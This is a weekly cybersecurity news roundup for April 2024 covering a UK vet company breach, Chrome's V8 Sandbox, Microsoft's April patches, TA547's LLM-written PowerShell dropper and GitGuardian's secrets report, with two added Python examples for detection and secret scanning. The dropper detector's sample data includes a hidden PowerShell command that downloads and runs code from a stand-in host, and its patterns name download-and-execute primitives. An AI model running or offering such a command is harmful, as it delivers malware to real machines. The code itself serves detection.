Weekly Cyber Reports

This Week in Cyber 12th April 2024

Latest news and views from our Cyber Analysts

Written by Team Nucleus

Written on 11th April, 2024


Analyst Insight

In this week's cybersecurity roundup, organisations faced ongoing challenges in safeguarding sensitive data and operations. CVS Group, a leading UK vet company, experienced a cyber incident resulting in disruption across operations and potential unauthorised access to personal information. This incident underscores the persistent threat cyberattacks pose to organisations' daily operations and data security. Meanwhile, Google introduced the V8 Sandbox in Chrome, led by Samuel Groß, to combat memory corruption issues. This innovative sandbox aims to contain memory corruption within the V8 engine, promising enhanced security for Chrome users worldwide. Additionally, Microsoft addressed a record 149 vulnerabilities in its April patch release, including actively exploited zero-days. This comprehensive effort reflects the ongoing battle against evolving cyber threats and underscores the importance of timely updates for system security.


However, cybercriminals employing sophisticated AI techniques targeted organisations in Germany, posing new challenges in detecting and mitigating cyber threats effectively. Despite defenders' efforts, the use of AI-generated content highlights the need for continuous vigilance in cybersecurity practices. Furthermore, GitGuardian's annual report revealed concerning trends in exposed credentials on GitHub and PyPI, emphasising the critical importance of proactive measures to mitigate risks and safeguard sensitive information from potential exploitation by malicious actors. As cybersecurity threats continue to evolve, organisations must remain vigilant and prioritise robust security measures to protect against emerging threats and ensure the integrity of their data and operations.


Cyber Incident Disrupts Operations at UK Vet Company CVS Group

CVS Group, one of the UK's largest vet companies, experienced a cyber incident resulting in disruption across all operations and potential unauthorised access to personal information. The incident, detected on Monday morning, involved limited unauthorised access to company IT systems. The Information Commissioner's Office was notified due to the risk of malicious access to personal data. Efforts to contain the attack caused operational disruption, with some IT systems temporarily taken offline. While most veterinary care continued, some IT systems are not functioning efficiently, impacting vet practice operations. CVS Group, which owns numerous vet practices, diagnostic laboratories, and pet crematoriums, is listed on the London Stock Exchange and operates in the Netherlands, Ireland, and Australia, where operations were unaffected by the attack.


Google Introduces V8 Sandbox in Chrome to Address Memory Corruption Issues

Google has introduced the V8 Sandbox in Chrome to combat memory corruption issues. Led by Samuel Groß, the sandbox aims to contain memory corruption within the V8 engine. It limits V8's code execution to a subset of the process's memory, mitigating vulnerabilities. Despite challenges, the sandbox isolates V8's heap memory, preventing corruption from spreading. It adds minimal overhead and will be enabled by default in Chrome 123. The sandbox requires a 64-bit system and addresses the limitations of current memory safety technologies. Google also emphasises the role of Kernel Address Sanitizer (KASan) in detecting memory bugs and enhancing Android firmware security.


Microsoft Fixes 149 Flaws in April Patch Release, Including Actively Exploited Zero-Days

In a massive April patch release, Microsoft has remediated a total of 149 vulnerabilities, marking a record for the month. Among these flaws, two have been sighted being actively exploited in the wild. The vulnerabilities include three critical, 142 important, three moderate, and one low-severity issue. Notably, the company addressed 21 vulnerabilities in its Chromium-based Edge browser as well. The actively exploited vulnerabilities are CVE-2024-26234, a proxy driver spoofing flaw, and CVE-2024-29988, a SmartScreen prompt security feature bypass.


While Microsoft's advisory lacks details about CVE-2024-26234, cybersecurity firm Sophos uncovered a malicious executable signed with a valid Microsoft certificate. The malware, found in a tool called LaiXi Android Screen Mirroring, includes a component acting as a backdoor, allowing attackers to intercept network traffic. The other exploited flaw, CVE-2024-29988, enables attackers to bypass Microsoft Defender SmartScreen protections when launching malicious files. Additionally, cybersecurity firm Varonis outlined methods attackers could use to circumvent audit logs while exfiltrating files from SharePoint, urging organisations to closely monitor their audit logs for suspicious access events. This release also addresses CVE-2024-29990, an elevation of privilege flaw in Microsoft Azure Kubernetes Service Confidential Container. The disclosure comes amid criticism of Microsoft's security practices and follows the company's decision to publish root cause data for security flaws using the Common Weakness Enumeration (CWE) industry standard.


AI-Enhanced Cyberattacks Targeting German Organisations

Cybercriminals, identified as TA547, are using sophisticated tactics to target organisations in Germany. They're sending emails containing fake invoices in password-protected ZIP files, with the password provided in the email itself. Inside the ZIP file is an LNK file, which, when executed, triggers a PowerShell script acting as a dropper to execute Rhadamanthys, an information stealer. Notably, this PowerShell script appears to be generated by large language models (LLMs) like ChatGPT or Copilot, evidenced by detailed comments in the code. This marks one of the first instances of AI-generated code being used in cyberattacks.


The shift to using LLMs in cyberattacks suggests that threat actors are becoming more sophisticated, using AI to generate social engineering lures and code to scale malicious activities. However, in the case of TA547 attacks, the AI-generated content did not change the functionality of the malware itself. TA547 is a financially motivated cybercriminal group known for targeting various regions, including Germany, Spain, Switzerland, Austria, and the US. Despite the evolving tactics, defenders have been able to detect and mitigate these attacks effectively.
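The chain above (password-protected ZIP, LNK, PowerShell dropper) seen from the telemetry side, as an added example that is not part of the report or any vendor's tooling; the events, the Sysmon-style field names (Image, ParentImage, CommandLine, CurrentDirectory) and the staging-directory assumptions are constructed.

```python
import re

# Dropper-style PowerShell arguments: hidden window, no profile, policy bypass,
# encoded command, or a download-and-execute primitive.
DROPPER_FLAGS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass"
    r"|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|invoke-webrequest|\biwr\b|downloadstring"
    r"|\biex\b|invoke-expression",
    re.IGNORECASE,
)
# Where a user-opened archive is staged before the LNK inside it is double-clicked
# (Windows' built-in ZIP viewer extracts to %TEMP%\Temp1_<name>.zip). Assumption.
STAGING_DIR = re.compile(r"\\(?:Temp|Downloads|Temp1_[^\\]+\.zip)(?:\\|$)", re.IGNORECASE)


def is_lnk_powershell_dropper(event: dict) -> bool:
    """True when PowerShell is spawned by explorer.exe (how a double-clicked LNK runs)
    from an archive staging directory with dropper-style arguments."""
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return False
    if not parent.endswith("explorer.exe"):
        return False
    return bool(DROPPER_FLAGS.search(event.get("CommandLine", ""))) and bool(
        STAGING_DIR.search(event.get("CurrentDirectory", "")))


def flag_events(events):
    """Return only the process-creation events matching the LNK -> PowerShell pattern."""
    return [e for e in events if is_lnk_powershell_dropper(e)]


# Constructed sample telemetry: an interactive PowerShell session (benign) and a
# PowerShell launched from an LNK inside an extracted invoice-lure ZIP.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe",
     "CurrentDirectory": r"C:\Users\alice\Documents"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -nop -ep bypass -c \"iex (iwr http://lure.example/x)\"",
     "CurrentDirectory": r"C:\Users\alice\AppData\Local\Temp\Temp1_Rechnung.zip"},
]
```

The parent-process condition is what separates the LNK launch from a script started by a scheduled task or an admin console; the password-protected ZIP itself never appears in process telemetry, so mail-gateway controls remain the earlier layer.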


GitGuardian's State of Secrets Sprawl: Insights into Exposed Credentials on GitHub and PyPI

In their annual report, GitGuardian uncovered concerning trends in exposed credentials across GitHub and PyPI. While GitHub saw a staggering 12.8 million new exposed secrets, PyPI also faced significant issues, with over 11,000 unique secrets discovered. What's worrisome is that some of these secrets, introduced as far back as 2017, remained valid years later. GitGuardian emphasised the importance of automating checks and promptly revoking leaked secrets. They highlighted the risks associated with exposed secrets, urging developers to avoid storing them in plain text, limit their privileges, and implement automated solutions. These measures are crucial for mitigating the risks of secret exposure and safeguarding projects from potential exploitation by malicious actors.
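One form the automated check GitGuardian recommends can take, as an added example that is not GitGuardian's tooling; the token patterns, the entropy threshold and the sample settings file are constructed assumptions, and none of the sample values are live credentials.

```python
import math
import re
from collections import Counter

# Well-known token shapes (AWS access key id, GitHub PAT, Slack token) plus a
# generic "secret-looking name = long quoted value" assignment. Constructed set.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "slack_token": re.compile(r"\bxox[baprs]-[0-9A-Za-z-]{10,}\b"),
    "generic_secret": re.compile(
        r"(?i)(?:api[_-]?key|secret|token|password)\s*[:=]\s*['\"]([^'\"\s]{16,})['\"]"),
}


def shannon_entropy(s: str) -> float:
    """Bits per character: random credentials score well above words and placeholders."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def scan_text(text: str, min_entropy: float = 3.5):
    """Return (line_no, rule, value) for each probable plaintext secret.
    The generic rule is entropy-gated so placeholders like 'changeme' are skipped."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for rule, rx in PATTERNS.items():
            for m in rx.finditer(line):
                value = m.group(1) if rx.groups else m.group(0)
                if rule == "generic_secret" and shannon_entropy(value) < min_entropy:
                    continue
                hits.append((no, rule, value))
    return hits


# Constructed sample settings file: one key id with a real token shape, one
# placeholder password, one high-entropy API key.
SAMPLE = """\
AWS_ACCESS_KEY_ID = "AKIAEXAMPLE012345678"
DB_PASSWORD = "changeme_changeme_changeme"
API_KEY = 'q8Zr3kLp2Nx7VwT1yHs9Bd4Mc6Fj0Ga5'
"""
```

Run as a pre-commit hook or CI step, a non-empty result from scan_text fails the push; anything it catches after the fact should be treated as already exposed and revoked, since a leaked secret is not made safe by a later commit that deletes it.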

